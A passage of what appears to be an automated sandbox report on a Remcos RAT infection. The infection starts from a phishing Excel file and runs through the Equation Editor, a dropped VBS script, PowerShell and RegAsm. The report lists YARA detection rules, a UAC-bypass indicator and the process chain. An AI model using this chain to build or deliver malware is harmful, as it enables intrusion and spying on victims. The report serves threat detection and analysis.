                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032AD799_2_0032AD79
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_0032479E9_2_0032479E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F4D5813_2_001F4D58
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_001F4D4813_2_001F4D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E0CC14_2_0043E0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041F0FA14_2_0041F0FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045415914_2_00454159
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043816814_2_00438168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004461F014_2_004461F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E2FB14_2_0043E2FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0045332B14_2_0045332B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0042739D14_2_0042739D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004374E614_2_004374E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043E55814_2_0043E558
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043877014_2_00438770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004378FE14_2_004378FE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043394614_2_00433946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044D9C914_2_0044D9C9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427A4614_2_00427A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041DB6214_2_0041DB62
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00427BAF14_2_00427BAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00437D3314_2_00437D33
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00435E5E14_2_00435E5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00426E0E14_2_00426E0E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0043DE9D14_2_0043DE9D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00413FCA14_2_00413FCA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00436FEA14_2_00436FEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1001719414_2_10017194
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_1000B5C114_2_1000B5C1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B04015_2_0044B040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043610D15_2_0043610D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044731015_2_00447310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044A49015_2_0044A490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040755A15_2_0040755A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043C56015_2_0043C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B61015_2_0044B610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044D6C015_2_0044D6C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004476F015_2_004476F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044B87015_2_0044B870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044081D15_2_0044081D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041495715_2_00414957
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004079EE15_2_004079EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407AEB15_2_00407AEB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044AA8015_2_0044AA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412AA915_2_00412AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B7415_2_00404B74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404B0315_2_00404B03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044BBD815_2_0044BBD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404BE515_2_00404BE5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00404C7615_2_00404C76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00415CFE15_2_00415CFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416D7215_2_00416D72
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D3015_2_00446D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00446D8B15_2_00446D8B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00406E8F15_2_00406E8F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040503817_2_00405038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041208C17_2_0041208C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004050A917_2_004050A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040511A17_2_0040511A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043C13A17_2_0043C13A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004051AB17_2_004051AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044930017_2_00449300
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040D32217_2_0040D322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A4F017_2_0044A4F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043A5AB17_2_0043A5AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041363117_2_00413631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044669017_2_00446690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A73017_2_0044A730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004398D817_2_004398D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004498E017_2_004498E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0044A88617_2_0044A886
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0043DA0917_2_0043DA09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00438D5E17_2_00438D5E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00449ED017_2_00449ED0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0041FE8317_2_0041FE83
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00430F5417_2_00430F54
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004050C218_2_004050C2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004014AB18_2_004014AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040513318_2_00405133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004051A418_2_004051A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040124618_2_00401246
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040CA4618_2_0040CA46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040523518_2_00405235
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_004032C818_2_004032C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_0040168918_2_00401689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00402F6018_2_00402F60
                Source: RFQ No. 109078906v.xla.xlsxOLE indicator, VBA macros: true
                Source: ~WRF{03652721-936B-412E-9DA4-9599756B16B0}.tmp.4.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 49 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.41beb20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.powershell.exe.41beb20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000E.00000002.620559291.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000D.00000002.512511300.0000000003E99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 2772, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 2780, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFA95D3F.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweettastedbananabuttersmoothchcolcatebutterrichcontenttokeepsmoothbutterchocolatebuntogetmesweetgirl________yummybutterchocolatesmoothheret[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: bhv2AF7.tmp.15.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLSX@19/30@11/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,15_2_004182CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_00417952
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,15_2_00418758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,14_2_0040F474
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_0041B4A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AA4A
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$RFQ No. 109078906v.xla.xlsxJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-R2I0JW
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7FE8.tmpJump to behavior
                Source: RFQ No. 109078906v.xla.xlsxOLE indicator, Workbook stream: true
                Source: 9EC30000.0.drOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................T.r.u.e.(.P........................................................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ....................................u.e.(.P........................................................s............................................Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.528838090.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: RFQ No. 109078906v.xla.xlsxVirustotal: Detection: 21%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
